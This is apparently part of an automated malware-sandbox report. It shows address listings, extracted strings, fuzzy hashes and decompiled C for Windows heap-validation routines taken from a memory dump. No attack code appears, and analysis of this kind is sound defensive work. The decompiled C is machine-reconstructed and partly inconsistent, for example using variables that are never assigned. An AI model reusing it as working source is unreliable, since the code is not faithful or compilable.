0x010a4f9e
0x010a4fa4
0x010a4fa8
0x010a4fc7
0x010a4fcc
0x010a4faa
0x010a4fbf
0x010a4fc4
0x010a4fd2
0x010a4fd5
0x010a4fd6
0x010a4f34
0x010a4f34
0x00000000
0x010a4f39
0x010a4e0e
0x010a4e14
0x010a4e1b
0x010a4e25
0x010a4e2b
0x010a4e2b
0x010a4e33
0x010a4e38
0x010a4e8a
0x010a4e8a
0x00000000
0x010a4e3a
0x010a4e3e
0x010a4e43
0x010a4e47
0x010a4e53
0x010a4e58
0x010a4e5a
0x010a4e5c
0x010a4e61
0x010a4e61
0x010a4e5a
0x010a4e6e
0x010a4f41
0x010a4f47
0x010a4f4b
0x010a4f6a
0x010a4f6f
0x010a4f4d
0x010a4f62
0x010a4f67
0x010a4f7f
0x010a4f80
0x010a4f81
0x00000000
0x010a4e74
0x010a4e78
0x010a4e82
0x010a4e88
0x010a4e88
0x00000000
0x010a4e78
0x010a4e6e
0x010a4e38
0x010a4df3
0x010a4bfe
0x010a4c01
0x010a4c04
0x010a4c07
0x010a4c09
0x010a4c0c
0x010a4c0e
0x010a4c0e
0x010a4c11
0x010a4c11
0x010a4c0c
0x010a4c14
0x010a4c17
0x010a4dae
0x010a4db2
0x010a4db7
0x010a4dba
0x010a4dbd
0x010a4ef1
0x010a4ef7
0x010a4efb
0x010a4f1a
0x010a4f1f
0x010a4efd
0x010a4f12
0x010a4f17
0x010a4f2b
0x010a4f2b
0x010a4f2d
0x010a4f2e
0x010a4f2f
0x00000000
0x010a4f2f
0x00000000
0x010a4c1d
0x010a4c1d
0x010a4c20
0x010a4c23
0x010a4c26
0x010a4c29
0x010a4c2c
0x010a4c2e
0x010a4d91
0x010a4d91
0x010a4d92
0x010a4d97
0x010a4d9e
0x00000000
0x010a4d9e
0x010a4c34
0x010a4c37
0x010a4c39
0x010a4c3c
0x00000000
0x00000000
0x010a4c45
0x010a4c48
0x010a4c4e
0x010a4c50
0x010a4c78
0x010a4c78
0x010a4c7b
0x010a4c7d
0x010a4c80
0x010a4c84
0x010a4cad
0x010a4cad
0x010a4cb0
0x010a4cb8
0x010a4cbb
0x010a4cbe
0x010a4cc1
0x010a4cc7
0x010a4cdc
0x010a4cc9
0x010a4cd2
0x010a4cd4
0x010a4cd4
0x010a4cde
0x010a4ce0
0x010a4d13
0x010a4d13
0x010a4d16
0x010a4d18
0x010a4d29
0x010a4d2a
0x010a4d2c
0x010a4d34
0x010a4d1a
0x010a4d1a
0x010a4d1a
0x010a4d1d
0x010a4d1f
0x010a4d22
0x010a4d24
0x010a4d24
0x010a4d3c
0x010a4d3f
0x010a4d45
0x010a4d47
0x010a4d6c
0x010a4d6c
0x010a4d70
0x010a4d7e
0x010a4d84
0x010a4d84
0x00000000
0x010a4d49
0x010a4d49
0x010a4d56
0x010a4d56
0x010a4d59
0x00000000
0x00000000
0x010a4d4e
0x010a4d50
0x010a4d52
0x010a4d8e
0x010a4d5d
0x010a4d5f
0x010a4d67
0x00000000
0x010a4d67
0x010a4d54
0x010a4d54
0x010a4d5b
0x00000000
0x010a4d5b
0x010a4ce2
0x010a4ce2
0x010a4ce5
0x010a4ce5
0x010a4ce7
0x010a4cfb
0x010a4ce9
0x010a4ce9
0x010a4cec
0x010a4cef
0x010a4cf1
0x010a4cf3
0x010a4cf3
0x010a4cf3
0x010a4cf6
0x010a4cf6
0x010a4d02
0x010a4d05
0x00000000
0x00000000
0x010a4d07
0x010a4d0f
0x010a4d11
0x00000000
0x00000000
0x00000000
0x010a4d11
0x00000000
0x010a4ce5
0x010a4ce0
0x010a4c8a
0x010a4c8f
0x010a4c91
0x00000000
0x00000000
0x010a4c9d
0x00000000
0x010a4c9d
0x010a4c52
0x010a4c5f
0x010a4c5f
0x010a4c62
0x00000000
0x00000000
0x010a4c57
0x010a4c59
0x010a4c5b
0x010a4caa
0x010a4c66
0x010a4c68
0x010a4c70
0x010a4c75
0x00000000
0x010a4c75
0x010a4c5d
0x010a4c5d
0x010a4c64
0x00000000
0x010a4c64
0x010a4c17
0x010a4b75
0x010a4bc4
0x010a4bc8
0x00000000
0x00000000
0x010a4bd9
0x00000000
0x00000000
0x00000000
0x010a4b77
0x010a4b7a
0x010a4b8c
0x010a4b7c
0x010a4b7e
0x010a4b83
0x010a4b86
0x010a4b86
0x010a4b90
0x010a4b93
0x00000000
0x00000000
0x010a4b95
0x010a4bab
0x010a4bb0
0x00000000
0x00000000
0x010a4bb2
0x010a4bb9
0x00000000
0x00000000
0x010a4bbb
0x010a4bbe
0x010a4bc1
0x010a4bc1
0x00000000
0x010a4bc1
0x010a4b97
0x010a4ba4
0x00000000
0x00000000
0x010a4ba6
0x00000000
0x010a4ba6
0x010a4ea9
0x010a4ea9
0x010a4eb2
0x00000000

Strings

Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 010A50C6
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 010A4F81
Heap block at %p has incorrect segment offset (%x), xrefs: 010A503B
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 010A508C
HEAP[%wZ]: , xrefs: 010A4EE1, 010A4F0D, 010A4F5D, 010A4FBA, 010A501D, 010A5061, 010A50FA
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 010A5119
Heap block at %p is not last block in segment (%p), xrefs: 010A4FD6
Free Heap block %p modified at %p after it was freed, xrefs: 010A4F2F
HEAP: , xrefs: 010A4F1A, 010A4F6A, 010A4FC7, 010A502A, 010A506E, 010A50B6, 010A5107

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: d547657117514410a6463564b1decd81b34316603f643a29bfe4ce6f3b5ed423
Instruction ID: 218e93b3ab540991a9662d178eef08cb1fe0f21c8986b6e17a7d6bc04b4cb2c4
Opcode Fuzzy Hash: d547657117514410a6463564b1decd81b34316603f643a29bfe4ce6f3b5ed423
Instruction Fuzzy Hash: 2312D234204642DFD725DFA9C495BBABBE5FF04310F588499E5C6CB682D7B8E880CB91

Uniqueness

Uniqueness Score: -1.00%

Function 010A4496, Relevance: 10.4, Strings: 8, Instructions: 417
COMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E010A4496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E010A49A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x10d6378 = _t267;
						asm("int3");
						 *0x10d6378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E0101174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E00FEB150();
							} else {
								E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E00FEB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E00FEB150();
							} else {
								E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E00FEB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x10d6350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E01029660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E0101174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E00FEB150();
										} else {
											E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E00FEB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E00FEB150();
									} else {
										E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E00FEB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E00FEB150();
								} else {
									E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E00FEB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E00FEB150();
							} else {
								E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E010A4AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E0109FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E010923E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}

0x010a44a1
0x010a44a3
0x010a44a7
0x010a44ac
0x010a44af
0x010a44b2
0x010a44b9
0x010a44bc
0x010a47f2
0x010a47f2
0x010a47f8
0x010a47fc
0x010a47fe
0x010a4804
0x010a4805
0x010a4805
0x010a480c
0x010a4810
0x010a4812
0x010a4812
0x010a4812
0x010a4822
0x010a4822
0x010a4827
0x010a4827
0x00000000
0x010a4827
0x010a44c4
0x010a44d3
0x010a44d9
0x010a44dc
0x010a44de
0x010a44e0
0x010a4560
0x010a4520
0x010a4522
0x010a4525
0x010a4528
0x010a452b
0x010a452e
0x010a4530
0x010a4697
0x010a469d
0x010a46a1
0x010a46c0
0x010a46c5
0x010a46a3
0x010a46b8
0x010a46bd
0x010a46cb
0x010a46d4
0x010a4677
0x010a4677
0x010a4679
0x010a467c
0x010a468a
0x010a4690
0x010a4690
0x010a47f1
0x010a47f1
0x010a47f1
0x00000000
0x010a47f1
0x010a4536
0x010a4539
0x010a453c
0x010a4636
0x010a463c
0x010a4640
0x010a465f
0x010a4664
0x010a4642
0x010a4657
0x010a465c
0x010a4670
0x00000000
0x010a4542
0x010a4542
0x010a4546
0x010a4548
0x010a454b
0x010a4555
0x010a455b
0x010a455b
0x010a455b
0x010a455d
0x010a455d
0x010a455d
0x00000000
0x010a455d
0x010a453c
0x010a4579
0x010a457c
0x010a4587
0x010a4589
0x010a4591
0x010a4592
0x010a4597
0x010a4598
0x010a45a1
0x010a45ab
0x010a45ab
0x010a45a1
0x010a45ae
0x010a45b4
0x010a45b9
0x010a45bd
0x010a4759
0x010a4759
0x010a475f
0x010a4761
0x010a4763
0x010a4765
0x010a4768
0x010a476b
0x010a476d
0x010a479c
0x010a479c
0x010a479f
0x010a47a2
0x010a47a4
0x010a4830
0x010a4833
0x010a4879
0x010a487d
0x010a48f1
0x010a48f3
0x010a48f3
0x00000000
0x010a48f3
0x010a487f
0x010a4885
0x010a4887
0x010a48a8
0x010a48a8
0x010a48ae
0x010a48b0
0x010a48dc
0x010a48dc
0x010a48dc
0x010a48dc
0x010a48ec
0x00000000
0x010a48ec
0x010a48b2
0x010a48bc
0x010a48be
0x010a48c1
0x00000000
0x00000000
0x00000000
0x00000000
0x010a48c3
0x010a48c3
0x010a48c6
0x010a48c9
0x010a48cc
0x010a48d1
0x010a48d4
0x00000000
0x00000000
0x010a48d6
0x010a48d7
0x010a48da
0x00000000
0x00000000
0x00000000
0x010a48da
0x010a494f
0x010a4955
0x010a4959
0x010a4978
0x010a497d
0x010a495b
0x010a4970
0x010a4975
0x010a4986
0x010a4987
0x010a498a
0x010a498d
0x010a4997
0x010a47ef
0x010a47ef
0x010a47ef
0x00000000
0x010a47ef
0x010a4890
0x010a4890
0x010a4891
0x010a4891
0x010a4894
0x010a4897
0x010a489d
0x010a48a0
0x00000000
0x00000000
0x010a48a2
0x010a48a3
0x010a48a6
0x00000000
0x00000000
0x00000000
0x010a48a6
0x010a48fb
0x010a4901
0x010a4905
0x010a4924
0x010a4929
0x010a4907
0x010a491c
0x010a4921
0x010a492f
0x010a4935
0x010a4936
0x010a4939
0x010a4942
0x00000000
0x010a4947
0x010a4835
0x010a483b
0x010a483f
0x010a485e
0x010a4863
0x010a4841
0x010a4856
0x010a485b
0x010a4869
0x010a486c
0x010a486f
0x010a47e7
0x010a47e7
0x00000000
0x010a47ec
0x010a47aa
0x010a47b0
0x010a47b4
0x010a47d3
0x010a47d8
0x010a47b6
0x010a47cb
0x010a47d0
0x010a47de
0x010a47df
0x010a47e2
0x00000000
0x00000000
0x00000000
0x00000000
0x010a476f
0x010a476f
0x010a4778
0x010a4785
0x010a4787
0x010a478c
0x010a478e
0x00000000
0x00000000
0x010a4790
0x010a4792
0x010a4794
0x00000000
0x00000000
0x010a4796
0x010a4799
0x00000000
0x010a4799
0x00000000
0x010a45c3
0x010a45c3
0x010a45c7
0x010a45c7
0x010a45ca
0x010a45cf
0x010a45d3
0x010a45df
0x010a45e4
0x010a45e6
0x010a45e8
0x010a45ed
0x010a45ed
0x010a45f2
0x010a45f2
0x010a45f7
0x010a45fc
0x010a4602
0x010a4606
0x010a4609
0x010a460f
0x010a46de
0x010a46e3
0x010a46e5
0x010a46ec
0x010a46ee
0x010a46f6
0x010a46f6
0x010a46f6
0x010a46f6
0x010a46ec
0x010a4615
0x010a4615
0x010a461d
0x010a462e
0x010a462e
0x010a461d
0x010a460f
0x010a4609
0x010a46fd
0x00000000
0x00000000
0x010a4710
0x010a471a
0x010a4720
0x010a4720
0x010a4722
0x010a472c
0x00000000
0x010a472e
0x010a472e
0x00000000
0x010a472e
0x010a472c
0x010a4738
0x010a473c
0x010a474b
0x010a4751
0x010a4751
0x00000000
0x010a473c
0x010a48f4
0x010a48f4
0x00000000
0x010a48f4

Strings

Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 010A486F
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 010A493D
HEAP[%wZ]: , xrefs: 010A4652, 010A46B3, 010A47C6, 010A4851, 010A4917, 010A496B
dedicated (%04Ix) free list element %p is marked busy, xrefs: 010A46CF
Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 010A4992
HEAP: , xrefs: 010A465F, 010A46C0, 010A47D3, 010A485E, 010A4924, 010A4978
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 010A47E2
Non-Dedicated free list element %p is out of order, xrefs: 010A466B

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 0-1357697941
Opcode ID: 10f76983453e78d5c1f0c1500aed9c20940bde863bb374544c74a41d4d5de50f
Instruction ID: 2430bbcaa3f769abb9ced837e7b7640726d6da3c52c3903d2bd5334e2ec2de55
Opcode Fuzzy Hash: 10f76983453e78d5c1f0c1500aed9c20940bde863bb374544c74a41d4d5de50f
Instruction Fuzzy Hash: BFF13439600686DFDB25CFA9C451BAABBF1FF08310F488069E1C6D7681C7B8E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0100A309, Relevance: 8.2, Strings: 6, Instructions: 687
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E0100A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x10d8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E0100A830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E0100DF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E00FE9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E00FEA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x10d8748 - 1;
						if( *0x10d8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E00FEB150();
								} else {
									E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E00FEB150();
								__eflags =  *0x10d7bc8;
								if( *0x10d7bc8 == 0) {
									__eflags = 1;
									E010A2073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x10d8748 - 1;
							if( *0x10d8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
